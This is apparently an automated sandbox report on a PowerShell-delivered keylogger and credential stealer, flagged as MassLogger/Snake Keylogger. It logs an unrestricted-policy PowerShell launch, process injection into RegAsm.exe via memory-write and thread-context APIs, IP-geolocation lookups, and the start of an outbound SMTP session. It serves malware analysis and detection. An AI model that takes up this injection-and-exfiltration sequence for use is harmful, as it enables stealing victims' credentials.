Jan 9, 2025 18:33:19.158149004 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:33:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 18:33:19.162092924 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 18:33:19.424876928 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:33:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 18:33:25.397774935 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 18:33:25.988481998 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:33:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49723	104.21.16.1	443	1280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 17:33:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 17:33:20 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:33:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1758789 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiWHDx6Gg1XV%2BZo6vlqIzK5BybNoq0c1sbh4XqqOjHikIlH%2BTk8FLfScQWCPaLZIghdo9nltCUdVwuDPlSu6Uh%2FlZ66ECar8RyaWxIy6vAtlktH7Hr4yECNzlSv7oyw9g88J21jC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff62bf8fbd90fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1476&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1978319&cwnd=252&unsent_bytes=0&cid=5d62abb122ff372d&ts=288&x=0"
2025-01-09 17:33:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 9, 2025 18:33:28.794415951 CET	587	49762	123.30.244.30	192.168.2.6	220-500254.static.maychudns.com ESMTP MSA Fri, 10 Jan 2025 00:33:28 +0700 220 ESMTP This server does not relay
Jan 9, 2025 18:33:28.794665098 CET	49762	587	192.168.2.6	123.30.244.30	EHLO 358075
Jan 9, 2025 18:33:29.439461946 CET	587	49762	123.30.244.30	192.168.2.6	250-500254.static.maychudns.com Hello 358075 [8.46.123.189], pleased to meet you 250-AUTH LOGIN CRAM-MD5 PLAIN 250-8BITMIME 250-ENHANCEDSTATUSCODES 250-STARTTLS 250 SIZE 35840000
Jan 9, 2025 18:33:29.441792011 CET	49762	587	192.168.2.6	123.30.244.30	STARTTLS
Jan 9, 2025 18:33:29.787869930 CET	587	49762	123.30.244.30	192.168.2.6	220 2.7.0 Ready to start TLS

Target ID:	0
Start time:	12:33:10
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:33:10
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:33:16
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x5e0000
File size:	139'776 bytes
MD5 hash:	9FB7455B1C6CB563FF7E58F422F3BC6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:33:17
Start date:	09/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x600000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FFD34630002 Relevance: 2.6, Strings: 1, Instructions: 1344COMMON

Download Yara Rule

Strings

8+V4, xrefs: 00007FFD3463016D

Memory Dump Source

Source File: 00000000.00000002.2253111435.00007FFD34630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34630000_powershell.jbxd

Similarity

API ID:
String ID: 8+V4
API String ID: 0-3986073652
Opcode ID: a257e18a44475da7d4f46f5f95a614b06d9aa5e08a39dd035b6a3702828387cf
Instruction ID: 83c7c342e96cda67af76d78e6690655d49598126ce87c2800a1f734fe6b61552
Opcode Fuzzy Hash: a257e18a44475da7d4f46f5f95a614b06d9aa5e08a39dd035b6a3702828387cf
Instruction Fuzzy Hash: 4D821522B0DBDA0FE7969B2858B52B57BE1EF57210B0901FBD189C71E7D91CAC0AC351

Function 00007FFD346307F7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253111435.00007FFD34630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef3998d6546bb2cc503f6365834201f6aa8991bff7be8b89cf449e9f5e7abe3
Instruction ID: 38c299a3b4bae4532eb39c9015fa6a28a3cc077845d2efa319d8680c53fdf1ae
Opcode Fuzzy Hash: 2ef3998d6546bb2cc503f6365834201f6aa8991bff7be8b89cf449e9f5e7abe3
Instruction Fuzzy Hash: B911EB22F1DD664BFFA89A0C64F61F912C1EF95310B540179E58DC25AADE2D6C0562C1

Function 00007FFD345637B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2252711623.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: fecc489bd3550d2a7b546a14688eb9ef515e6737c63900dbdb0ecb939a2c68aa
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 5001A77020CB0C4FD744EF0CE051AA6B7E0FB95324F10052DE58AC3661D736E882CB41

Analysis Process: x.exePID: 1428, Parent PID: 5088COMMON

Execution Graph

Execution Coverage:	28.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	133
Total number of Limit Nodes:	1

Executed Functions

Function 00C257CC Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,03A1358C,03A13590,00C26316,?,?,?,?,?), ref: 00C266A3

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cd0f44a29e79f249d62b65d01268a678823fdc402bbca1c962b7b94545c64aab
Instruction ID: f49736b3bf1298d78aa526dc2ad6d7aa9943b0f5b69c9231c4ad71698791be3b
Opcode Fuzzy Hash: cd0f44a29e79f249d62b65d01268a678823fdc402bbca1c962b7b94545c64aab
Instruction Fuzzy Hash: 37D12770D00229CFDB20CFA8D881BEDBBF1BB49304F1091A9E559A7650DB749E85CF95

Function 00C26374 Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,03A1358C,03A13590,00C26316,?,?,?,?,?), ref: 00C266A3

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0f38f36289d46d15085f9772eb302d85410e35de52d1d7bce16737f8f8103683
Instruction ID: cba3ac5d68e9fd9927b599100d47338e648cb3faaf174aa93090f817bef74519
Opcode Fuzzy Hash: 0f38f36289d46d15085f9772eb302d85410e35de52d1d7bce16737f8f8103683
Instruction Fuzzy Hash: 17D12770D00229CFDB20CFA8D881BEDBBF1BB49304F1091AAD559A7690DB749E85CF95

Function 00C2583C Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00C271AD

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1d1f12a75138ed2fae918c000df37c6c0ef26d281d801c1d3a4edf93b422fd35
Instruction ID: 482f2536a989e6161a6e4922cecc4db50fc40ab43867d917db484d4bbd1c40d4
Opcode Fuzzy Hash: 1d1f12a75138ed2fae918c000df37c6c0ef26d281d801c1d3a4edf93b422fd35
Instruction Fuzzy Hash: BF4177B5D042589FCF10CFA9D984AAEFBF1BF49310F24902AE818BB210D375A955CB64

Function 00C270D0 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00C271AD

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0ba1ede285417bb9fbc64f2057f24af81ec31d011cd2f90de2ffa3de2aa1a83d
Instruction ID: c74ba1dc5a6fb482ce339826d2de107164928685b611e6b6d5358897543a7c9b
Opcode Fuzzy Hash: 0ba1ede285417bb9fbc64f2057f24af81ec31d011cd2f90de2ffa3de2aa1a83d
Instruction Fuzzy Hash: 334188B5D04258DFCB10CFA9D984AEEBBB1BF49310F24902AE818B7210D375A955CF54

Function 00C26D28 Relevance: 1.6, APIs: 1, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C26DDC

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fba93ed1416efd365490f8d20d425d1c21780a8cfe592f6d2997c6fe45c4b8c0
Instruction ID: 0183f6205d98606151c0bc66ec3914422c1cac72d5f1641e77991a41507cb44b
Opcode Fuzzy Hash: fba93ed1416efd365490f8d20d425d1c21780a8cfe592f6d2997c6fe45c4b8c0
Instruction Fuzzy Hash: 1D419AB9D05258DFCF10CFA9E984A9EFBB0FB09310F24911AE818B7250D771A941CF64

Function 00C2580C Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(00000004,?,00C26AFB,?,?), ref: 00C26BDC

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fece74d43d9eec592ee7651ad7adf7e09cc76864e552cb1711b0d334fdb4ef44
Instruction ID: edb49640a759719474030e8f89a8612a22df69b4070482a45ad2578a01a741ed
Opcode Fuzzy Hash: fece74d43d9eec592ee7651ad7adf7e09cc76864e552cb1711b0d334fdb4ef44
Instruction Fuzzy Hash: C64177B9D042589FCF10CFA9D984A9EFBF1FB09310F20906AE918B7210D375A945CB64

Function 00C26B20 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(00000004,?,00C26AFB,?,?), ref: 00C26BDC

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 157f92e8213d809969ed1a6710184821a3e59bce1f079e374219a3c989896115
Instruction ID: 4aace381132a38f44d17fb4dd11ba598ff9fea2db15455e953037ca7d00c9f0b
Opcode Fuzzy Hash: 157f92e8213d809969ed1a6710184821a3e59bce1f079e374219a3c989896115
Instruction Fuzzy Hash: D74189B9D01258DFCF10CFA9D984ADEFBB1BB09310F24902AE918B7210D375AA45CF64

Function 00C25824 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C26DDC

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1482f4263554606676072e45dd54ee20dbca0ac8d52cd0509b563db3c8d51888
Instruction ID: e8393f477ef434c4b408170a6fcfe763507c0e674dd8f9090b3742a12b8ba280
Opcode Fuzzy Hash: 1482f4263554606676072e45dd54ee20dbca0ac8d52cd0509b563db3c8d51888
Instruction Fuzzy Hash: F94167B9D052589FCF10CFA9D984A9EFBB1BB09310F20902AE918B7210D775A911CB64

Function 00C25854 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00C26A49

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4babb002cdc05eb330c5e4a79401d399e1570923431de1aa15b00bc361c9d036
Instruction ID: c5aad1d047d6596d6753b0680132dec90eb5d8e7d7a90aa8fd78970a399df36a
Opcode Fuzzy Hash: 4babb002cdc05eb330c5e4a79401d399e1570923431de1aa15b00bc361c9d036
Instruction Fuzzy Hash: D44199B5D01258DFCB10CFAAD984A9EFBF0BB49310F24906AE419B7210D778AA45CF64

Function 00C257E4 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00C26A49

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8b39b53ad37154ea9a071de9622698a1e23f4ed7617b7414ef188effeb125705
Instruction ID: ea533d2c71e311358324d78551456f0e030582f15f52b4f8391d46593d825685
Opcode Fuzzy Hash: 8b39b53ad37154ea9a071de9622698a1e23f4ed7617b7414ef188effeb125705
Instruction Fuzzy Hash: D9419AB5D01258DFCF10CFAAD984AAEFBF0BB49310F20906AE419B7250D774A945CF64

Function 00C21BD1 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C21C7F

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ce8b3f5fad86fa533e1ae34d64a0ecffaf971a88eafaebad71faa57e364172b6
Instruction ID: 9a16c208b2b5c616367a66ccd64f33fa35870b790b15fc889198ac717b968515
Opcode Fuzzy Hash: ce8b3f5fad86fa533e1ae34d64a0ecffaf971a88eafaebad71faa57e364172b6
Instruction Fuzzy Hash: 2A3189B9D042589FCB10CFA9E584ADEFBB1BB19310F24906AE814B7210D774AA45CF64

Function 00C21BD8 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C21C7F

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: deb41db035b5a216441f01454794157a5340dec8b1f3fed560213306a231dd3e
Instruction ID: 62deb892985abc63044cc724d73d7ede311889567440eb584f5627dac399819a
Opcode Fuzzy Hash: deb41db035b5a216441f01454794157a5340dec8b1f3fed560213306a231dd3e
Instruction Fuzzy Hash: 913178B9D042589FCB10CFA9E584ADEFBF1BB59310F24902AE814B7210D775A945CF64

Function 00C26990 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00C26A49

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9ccc529d33fc2416bc496a716974f26691ef8afdd48cbf17cc6e108965b8fa91
Instruction ID: 9f053eafb74f5ed21c7b4b19e9f82e46f045bc5806c20274baaa87bc8114ee6d
Opcode Fuzzy Hash: 9ccc529d33fc2416bc496a716974f26691ef8afdd48cbf17cc6e108965b8fa91
Instruction Fuzzy Hash: 454196B5D01259DFCF10CFAAD984A9EFBF0BB49314F24802AE418B7250D378AA45CF64

Function 00C2586C Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(00000000), ref: 00C274F5

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f6c454cbb0859c800dbfb8f1c4513d031084016f45bde59584728be8597a1f51
Instruction ID: 18d42cc51886658b2a4c1140817c57aa53463438147f26930ce68d02a04c62fa
Opcode Fuzzy Hash: f6c454cbb0859c800dbfb8f1c4513d031084016f45bde59584728be8597a1f51
Instruction Fuzzy Hash: 183199B5D052589FCB10DFA9E984A9EFBF4AB49310F20916AE914B7310D774A901CFA4

Function 00C27470 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(00000000), ref: 00C274F5

Memory Dump Source

Source File: 00000004.00000002.2227565057.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c20000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 07a3a5fef55b0a8ea96a92e0d86856f3f9b474cc2917364576dd1f0b80b21bf0
Instruction ID: e8d70327cf9107ed3ba58b26a5123f219164a60358e0b84a506b83704c5f1cfe
Opcode Fuzzy Hash: 07a3a5fef55b0a8ea96a92e0d86856f3f9b474cc2917364576dd1f0b80b21bf0
Instruction Fuzzy Hash: 193198B5D05259DFCB10CFA9E984A9EFBF0BB49310F24906AE818B7710D774A901CF64

Analysis Process: RegAsm.exePID: 1280, Parent PID: 1428COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.2%
Total number of Nodes:	192
Total number of Limit Nodes:	4

Executed Functions

Function 00F0C168 Relevance: 2.0, APIs: 1, Instructions: 535
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5376da02d70e54bed306fd03081ad2076da7140591eb01c696919993afc9eb4d
Instruction ID: bf466193418c8b463c96cf21a07123ed30954bcfc9d1006868525d71def5cb59
Opcode Fuzzy Hash: 5376da02d70e54bed306fd03081ad2076da7140591eb01c696919993afc9eb4d
Instruction Fuzzy Hash: 95221B74E00219CFDB14DFA8C884B9DBBB2BF84300F5486A9D409A7395DB759D86DF90

Function 05EB7770 Relevance: .9, Instructions: 918COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0ab7638a9191fec4dfb9266d86e552ebc31c46906b7996c70ffd36abb389bc
Instruction ID: fe3182ac83d0c35665551f77c3e7c71b1d4874967de3c042ae14923340a8f596
Opcode Fuzzy Hash: 4e0ab7638a9191fec4dfb9266d86e552ebc31c46906b7996c70ffd36abb389bc
Instruction Fuzzy Hash: 66826930A04605DFEB14CF68C884AEEBBF6FF88315F149559E486AB761D7B0E941CB90

